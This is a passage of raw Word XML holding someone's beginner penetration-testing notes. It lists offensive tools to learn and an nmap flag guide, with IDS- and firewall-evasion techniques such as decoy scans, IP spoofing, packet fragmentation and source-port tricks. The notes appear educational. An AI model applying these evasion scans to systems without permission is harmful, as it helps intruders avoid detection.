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4149" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">THINGS TO REMEMBER </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC19390" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- any </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>bindshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> on ports are </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>man made</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> and are not common </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7046F9DD" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- The Sessions command can show you if you have any active sessions running </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEC8B8B" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- git clone to download </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> links</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B241DE" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>- CANNOT USE 2 PORTS AT THE SAME TIME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F95AA8E" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>fastfetch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> can show system info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBCD94F" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- When </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> doesn't display text use: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>stty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> echo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E98FBB" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="693BBF37" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>TOOLS TO LEARN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3423895B" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>Nikito</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="525942DF" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>HashCat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4567448C" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>SQLmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="25BD790A" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>- Hydra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D947BA" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>Wifite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5AA19544" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>Settoolkit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="03E844B9" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>gophish</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00A119B8" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>xsser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3F645746" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>wfuzz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0774F173" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>- amass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5F7FA0" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>assetfinder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="66AFF577" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="0768B5FE" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>For Anime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571A89FE" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>- ani-cli</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302CC25F" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="40297BF8" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="1285C18C" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>nmaps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> guide</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305ED347" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Filtered ports are when </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>nmaps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> cant </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>figureout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> if a port is open or closed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>usally</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> because they are behind a firewall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DC2635" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>sU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> is for UDP </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B289CE" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> is for TCP non full handshake </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545D99C6" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">-O is for looking for operating systems </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E11706" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> is for looking for versions of service on an Open Port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473D0FB4" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>-S used to spoof my IP address will not get results of scan back // must be run with -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> to assume all host are online (doesn't perform the ping scan)  // </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C905405" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">-e (used to specify network interface </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F3FF50" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>-g can specify source port (Some servers need a specific port to be sent from to be able to accept so if you can specify the right port u may be able to bypass the firewall)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06965C15" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">-A to get an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>agressive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> scan option // </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>enabels</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> OS detection, Version detection, and enables </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> script scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51575810" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>sn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> is to see which host are up and running </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDA2DC3" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>sF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> performs a FIN scan // </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331A6469" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">-T comes with 6 different mode 0-5 // 0&amp;1 for IDS evasion will take LONG  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168AF06E" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>-p is what range of ports do you want to scan useful if you know which port you want to scan // to specify more use , if you want a range of port use -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B366F18" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>-F to scan top 100 used ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2250E255" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>-f to send tiny fragmented IP Packets // can split the packets into 16th by adding another -f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14079F0A" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">-D can cause decoys to be sent out // This will include your IP but it will be too many to point it back to you // To specify how many random IP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>adresses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> I want to send I can use RND: 100 before IP // IP might stick out due to IP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> being </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>truley</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> random anyone with basic knowledge can see your local IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036CF30A" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">To get a specified random IP to make it seem like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>its</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> from a local Ip </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>Addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> u can specify the IPs before sending // Ex. 192.168.1.2,192.168.1.5,192.168.1.9,192.168.1.8,ME me=Your IP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="05B48726" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>mtu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> to increase packet size // must specify fragment size and it must be a multiple of 8   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B17F56" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>oN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> to save to file and output on terminal </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296F11D6" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">- If you want you scan to be in a file use &gt;&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250C0181" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>- To turn up version intensity type --version-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>intesity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> 1-9 to specify before the IP address </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A285A2" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">Ex. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> --version-intensity Ip address </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DED7489" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">Since most of these get caught by firewalls and IDS we have to use some other methods using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="499CA00F" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">These techniques </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>usally</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>wont</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> work on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>regualar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> machines with firewalls due to the fact that home computers </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>dont</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> accept any port request but usually bigger servers that run remote access will have some ports open  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B535B2" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="7AD9A3C2" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Nmap guide Pt. 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6C4F3A" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">Scripts </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78282062" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">to run a specific group with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366F5846" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">Ex. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> --script (Script specification like auth) IP (type of scan)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689A34E4" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">auth:  helps us figure out any authentications that the port may provide and can give us key details to any </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>vunerabilities</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEC0942" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">malware:  helps is figure out if there is any malware on the systems </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402C2189" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>banner: helps us find information through the open port //  gives us stuff like versions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780F68A5" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">exploit: Aims to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>activly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> exploit some vulnerability // finds all possible vulnerabilities // CVE means a classification for the vulnerability usually start 2011 (year)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022E8705" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>More on https://nmap.org/book/nse-usage.html under scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFE6EB5" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="34E9EFD2" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">To find more </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>Nmaps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> scripts go to /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
